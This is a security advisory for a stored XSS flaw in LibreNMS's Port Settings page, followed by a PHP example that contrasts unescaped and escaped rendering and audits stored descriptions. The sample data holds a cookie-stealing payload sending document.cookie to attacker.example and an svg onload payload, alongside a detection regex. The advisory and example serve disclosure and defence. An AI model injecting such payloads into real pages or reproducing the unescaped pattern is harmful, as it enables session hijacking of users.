PT-2024-34658 · Librenms · Librenms

Raphaelcss +1 · Published 2024-11-15 · Updated 2024-11-20 · CVE-2024-51494
CVSS v3.1: 7.5 High
Vector: AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L
Name of the Vulnerable Software and Affected Versions: LibreNMS versions prior to 24.10.0
Description: A Stored Cross-Site Scripting (XSS) vulnerability in the "Port Settings" page allows authenticated users with the rights to edit a device's port settings (the vector's PR:H) to inject arbitrary JavaScript through the descr parameter. The stored payload executes in the browser of any user who later visits the "Port Settings" page, which can compromise that user's session and allow actions to be performed with their privileges.
Recommendations: For versions prior to 24.10.0, update to version 24.10.0 or later to fix the vulnerability. As a temporary workaround, consider restricting access to the "Port Settings" page or disabling the editing of device port settings until the update is applied. Avoid using the descr parameter in the affected API endpoint until the issue is resolved.
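The following is an added example and is not LibreNMS code. It reproduces the generic pattern behind a stored XSS like the one described above (a description saved through a descr-style parameter by a privileged user and later rendered into HTML), shows the unescaped rendering beside the escaped one, and includes a heuristic audit over stored descriptions so values saved before the upgrade can be reviewed, whichever side of the fix (input or output) the project applied. The function names, the row layout and the sample data are hypothetical and constructed for the example.

```php
<?php
declare(strict_types=1);

// Added example; not LibreNMS code. Names (render_port_row_*, esc_html,
// audit_descriptions) and the row layout are hypothetical.

/** Vulnerable pattern: the stored description is interpolated into HTML as-is. */
function render_port_row_vulnerable(string $ifName, string $descr): string
{
    return "<tr><td>{$ifName}</td><td>{$descr}</td></tr>";
}

/** HTML body/attribute escaping, comparable to Laravel's e() helper. */
function esc_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Hardened pattern: every user-controlled value is escaped at output time. */
function render_port_row_safe(string $ifName, string $descr): string
{
    return '<tr><td>' . esc_html($ifName) . '</td><td>' . esc_html($descr) . '</td></tr>';
}

/**
 * Audit helper: flag stored descriptions that look like HTML/JS injection
 * (a tag start, an on*= handler, or a javascript: URL). Heuristic for a
 * post-upgrade review, not a sanitizer and not a substitute for escaping.
 */
function audit_descriptions(array $rows): array
{
    $flagged = [];
    foreach ($rows as $row) {
        if (preg_match('/<\s*\w|\bon\w+\s*=|javascript\s*:/i', $row['descr'])) {
            $flagged[] = $row;
        }
    }
    return $flagged;
}

// Constructed sample data (not taken from a real LibreNMS instance).
$rows = [
    ['port_id' => 1, 'ifName' => 'Gi0/1', 'descr' => 'Uplink to core-sw1'],
    ['port_id' => 2, 'ifName' => 'Gi0/2',
     'descr' => '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'],
    ['port_id' => 3, 'ifName' => 'Gi0/3', 'descr' => '"><svg onload=alert(1)>'],
];

foreach ($rows as $row) {
    echo "vulnerable: ", render_port_row_vulnerable($row['ifName'], $row['descr']), PHP_EOL;
    echo "hardened:   ", render_port_row_safe($row['ifName'], $row['descr']), PHP_EOL;
}

echo PHP_EOL, "Descriptions needing review (port_id): ",
    implode(', ', array_column(audit_descriptions($rows), 'port_id')), PHP_EOL;
```

Run with `php example.php`. The vulnerable rows emit the `<img>` and `<svg>` markup verbatim into the table, while the hardened rows show it as `&lt;img ...&gt;` text; the audit flags port_id 2 and 3. The escaping is correct for HTML body and attribute contexts; a description placed into a JavaScript string or a URL would need the encoding for that context instead.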

Exploit · Fix · XSS

Weakness Enumeration

Related Identifiers

CVE-2024-51494
GHSA-7663-37RG-C377

Affected Products

Librenms